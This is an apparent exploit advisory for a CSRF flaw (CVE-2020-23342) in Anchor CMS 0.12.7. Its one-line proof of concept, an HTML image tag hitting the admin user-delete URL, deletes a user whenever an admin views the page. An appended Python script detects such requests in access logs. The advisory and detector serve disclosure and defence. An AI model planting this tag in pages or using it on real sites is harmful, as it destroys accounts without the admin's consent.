## https://sploitus.com/exploit?id=PACKETSTORM:161048
# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)  
# Exploit Author: Ninad Mishra  
# Vendor Homepage: https://anchorcms.com/  
# Software Link: https://anchorcms.com/download  
# Version: 0.12.7  
# CVE : CVE-2020-23342  
  
  
###PoC  
The CMS uses the GET method to perform sensitive actions, hence users can be deleted via exploit.html:  
  
================================   
<img src="http://target/anchor/index.php/admin/users/delete/21">  
================================   
Where 21 is the user ID.  
  
When the admin clicks on the exploit.html link, the user with ID 21 will be deleted.
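
A detection sketch for the issue described above, added here and not part of the original advisory: it scans web-server access logs in Combined Log Format for GET requests to the user-delete route shown in the PoC whose Referer is missing or points to another site. The host name `blog.example`, the sample log lines and the function name `find_csrf_candidates` are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Combined Log Format: ip ident user [time] "METHOD path proto" status size "referer" ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)"'
)
# Route shape taken from the PoC URL in the advisory.
DELETE_RE = re.compile(r'/admin/users/delete/(?P<uid>\d+)(?:[/?#]|$)')

def find_csrf_candidates(lines, site_host):
    """Return GET user-delete requests that were not referred from site_host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m['method'] != 'GET':
            continue
        d = DELETE_RE.search(m['path'])
        if not d:
            continue
        ref = m['referer']
        ref_host = urlparse(ref).hostname if ref not in ('', '-') else None
        if ref_host == site_host.lower():
            continue  # issued from the admin UI itself
        # No usable host means the header was absent or unparsable.
        reason = 'missing-or-invalid-referer' if ref_host is None else 'cross-site-referer'
        hits.append({'time': m['time'], 'ip': m['ip'], 'user_id': d['uid'],
                     'status': m['status'], 'referer': ref, 'reason': reason})
    return hits

# Constructed sample log lines (hosts, addresses and statuses are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jan/2021:10:00:01 +0000] "GET /anchor/index.php/admin/users/delete/7 HTTP/1.1" 302 0 "http://blog.example/anchor/index.php/admin/users/edit/7" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Jan/2021:10:05:42 +0000] "GET /anchor/index.php/admin/users/delete/21 HTTP/1.1" 302 0 "http://other.example/exploit.html" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Jan/2021:10:06:03 +0000] "GET /anchor/index.php/admin/users/delete/22 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Jan/2021:10:07:15 +0000] "GET /anchor/index.php/admin/users HTTP/1.1" 200 5120 "http://blog.example/anchor/index.php/admin" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in find_csrf_candidates(SAMPLE_LOG, 'blog.example'):
        print(hit)
```

A missing Referer is flagged because a referrer policy on the embedding page can suppress the header; treat hits as leads to correlate with actual account deletions.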